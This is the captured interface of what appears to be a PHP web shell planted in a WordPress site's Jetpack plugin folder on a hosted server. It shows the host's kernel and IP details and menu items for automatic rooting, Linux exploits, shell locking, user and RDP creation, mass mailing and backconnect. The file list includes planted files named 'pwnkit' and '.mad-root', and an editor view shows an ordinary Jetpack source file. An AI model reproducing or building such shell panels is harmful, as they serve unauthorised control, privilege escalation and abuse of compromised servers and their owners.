Linux webm014.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.130.20.14 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.4.33
hsesolc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hsesolc /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
422.56
KB
-rw-r--r--
LICENSE.txt
17.98
KB
-rw-r--r--
SECURITY.md
2.33
KB
-rw-r--r--
class-jetpack-connection-statu...
729
B
-rw-r--r--
class-jetpack-gallery-settings...
3.25
KB
-rw-r--r--
class-jetpack-pre-connection-j...
5.77
KB
-rw-r--r--
class-jetpack-recommendations-...
9.08
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
5.23
KB
-rw-r--r--
class-jetpack-wizard-banner.ph...
214
B
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
8.27
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
19.82
KB
-rw-r--r--
class.jetpack-affiliate.php
141
B
-rw-r--r--
class.jetpack-autoupdate.php
9.64
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
156
B
-rw-r--r--
class.jetpack-cli.php
71.2
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.79
KB
-rw-r--r--
class.jetpack-connection-banne...
19.35
KB
-rw-r--r--
class.jetpack-data.php
211
B
-rw-r--r--
class.jetpack-gutenberg.php
37.92
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.56
KB
-rw-r--r--
class.jetpack-idc.php
351
B
-rw-r--r--
class.jetpack-modules-list-tab...
14.51
KB
-rw-r--r--
class.jetpack-network-sites-li...
5.9
KB
-rw-r--r--
class.jetpack-network.php
21.31
KB
-rw-r--r--
class.jetpack-plan.php
8.93
KB
-rw-r--r--
class.jetpack-post-images.php
29.29
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
13.06
KB
-rw-r--r--
class.jetpack-user-agent.php
31.01
KB
-rw-r--r--
class.jetpack.php
226.67
KB
-rw-r--r--
class.json-api-endpoints.php
80.07
KB
-rw-r--r--
class.json-api.php
33.39
KB
-rw-r--r--
class.photon.php
48.63
KB
-rw-r--r--
composer.json
3.62
KB
-rw-r--r--
enhanced-open-graph.php
4.45
KB
-rw-r--r--
functions.compat.php
4.66
KB
-rw-r--r--
functions.cookies.php
1.98
KB
-rw-r--r--
functions.global.php
13.91
KB
-rw-r--r--
functions.opengraph.php
17.6
KB
-rw-r--r--
functions.photon.php
10.26
KB
-rw-r--r--
jetpack.php
7.99
KB
-rw-r--r--
json-api-config.php
330
B
-rw-r--r--
json-endpoints.php
6.7
KB
-rw-r--r--
load-jetpack.php
4.03
KB
-rw-r--r--
locales.php
324
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
24.4
KB
-rw-r--r--
require-lib.php
1.3
KB
-rw-r--r--
uninstall.php
1.29
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-jetpack-stats-dashboard-widget.php
<?php /** * Adds the Jetpack stats widget to the WordPress admin dashboard. * * @package jetpack */ use Automattic\Jetpack\Assets\Logo as Jetpack_Logo; use Automattic\Jetpack\Redirect; use Automattic\Jetpack\Status; /** * Class that adds the Jetpack stats widget to the WordPress admin dashboard. */ class Jetpack_Stats_Dashboard_Widget { /** * Indicates whether the class initialized or not. * * @var bool */ private static $initialized = false; /** * Initialize the class by calling the setup static function. * * @return void */ public static function init() { if ( ! self::$initialized ) { self::$initialized = true; self::wp_dashboard_setup(); } } /** * Sets up the Jetpack Stats widget in the WordPress admin dashboard. */ public static function wp_dashboard_setup() { if ( Jetpack::is_connection_ready() ) { add_action( 'jetpack_dashboard_widget', array( __CLASS__, 'dashboard_widget_footer' ), 999 ); } if ( has_action( 'jetpack_dashboard_widget' ) ) { $widget_title = sprintf( __( 'Stats by Jetpack', 'jetpack' ) ); wp_add_dashboard_widget( 'jetpack_summary_widget', $widget_title, array( __CLASS__, 'dashboard_widget' ) ); wp_enqueue_style( 'jetpack-dashboard-widget', plugins_url( 'css/dashboard-widget.css', JETPACK__PLUGIN_FILE ), array(), JETPACK__VERSION ); wp_style_add_data( 'jetpack-dashboard-widget', 'rtl', 'replace' ); } } /** * Fires dashboard widget action. * Both the footer from this file and the stats graph from modules/stats.php hook into this action. */ public static function dashboard_widget() { /** * Fires when the dashboard is loaded. * * @since 3.4.0 */ do_action( 'jetpack_dashboard_widget' ); } /** * Load the widget footer showing Akismet stats. */ public static function dashboard_widget_footer() { ?> <footer> <div class="blocked-container"> <div class="protect"> <h3><?php esc_html_e( 'Brute force attack protection', 'jetpack' ); ?></h3> <?php if ( Jetpack::is_module_active( 'protect' ) ) : ?> <p class="blocked-count"> <?php echo esc_html( number_format_i18n( get_site_option( 'jetpack_protect_blocked_attempts', 0 ) ) ); ?> </p> <p><?php echo esc_html_x( 'Blocked malicious login attempts', '{#} Blocked malicious login attempts -- number is on a prior line, text is a caption.', 'jetpack' ); ?></p> <?php elseif ( current_user_can( 'jetpack_activate_modules' ) && ! ( new Status() )->is_offline_mode() ) : ?> <a href=" <?php echo esc_url( wp_nonce_url( Jetpack::admin_url( array( 'action' => 'activate', 'module' => 'protect', ) ), 'jetpack_activate-protect' ) ); ?> " class="button button-jetpack" title="<?php esc_attr_e( 'Protect helps to keep you secure from brute-force login attacks.', 'jetpack' ); ?>"> <?php esc_html_e( 'Activate brute force attack protection', 'jetpack' ); ?> </a> <?php else : ?> <?php esc_html_e( 'Brute force attack protection is inactive.', 'jetpack' ); ?> <?php endif; ?> </div> <div class="akismet"> <h3><?php esc_html_e( 'Anti-spam', 'jetpack' ); ?></h3> <?php if ( is_plugin_active( 'akismet/akismet.php' ) ) : ?> <p class="blocked-count"> <?php echo esc_html( number_format_i18n( get_option( 'akismet_spam_count', 0 ) ) ); ?> </p> <p><?php echo esc_html_x( 'Blocked spam comments.', '{#} Spam comments blocked by Akismet -- number is on a prior line, text is a caption.', 'jetpack' ); ?></p> <?php elseif ( current_user_can( 'activate_plugins' ) && ! is_wp_error( validate_plugin( 'akismet/akismet.php' ) ) ) : ?> <a href=" <?php echo esc_url( wp_nonce_url( add_query_arg( array( 'action' => 'activate', 'plugin' => 'akismet/akismet.php', ), admin_url( 'plugins.php' ) ), 'activate-plugin_akismet/akismet.php' ) ); ?> " class="button button-jetpack"> <?php esc_html_e( 'Activate Anti-spam', 'jetpack' ); ?> </a> <?php else : ?> <p><a href="<?php echo esc_url( 'https://akismet.com/?utm_source=jetpack&utm_medium=link&utm_campaign=Jetpack%20Dashboard%20Widget%20Footer%20Link' ); ?>"><?php esc_html_e( 'Anti-spam can help to keep your blog safe from spam!', 'jetpack' ); ?></a></p> <?php endif; ?> </div> </div> <div class="footer-links"> <?php $jetpack_logo = new Jetpack_Logo(); echo $jetpack_logo->get_jp_emblem( true );// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped if ( Jetpack::is_module_active( 'stats' ) ) : ?> <span> <?php if ( current_user_can( 'jetpack_manage_modules' ) ) : $i18n_headers = jetpack_get_module_i18n( 'stats' ); ?> <a href="<?php echo esc_url( admin_url( 'admin.php?page=jetpack#/settings?term=' . rawurlencode( $i18n_headers['name'] ) ) ); ?>" > <?php esc_html_e( 'Configure stats', 'jetpack' ); ?> </a> | <?php endif; ?> <a href="<?php echo esc_url( Redirect::get_url( 'jetpack-support-wordpress-com-stats' ) ); ?>" target="_blank"><?php esc_html_e( 'Learn more', 'jetpack' ); ?></a> </span> <?php endif; ?> </div> </footer> <?php } }
Close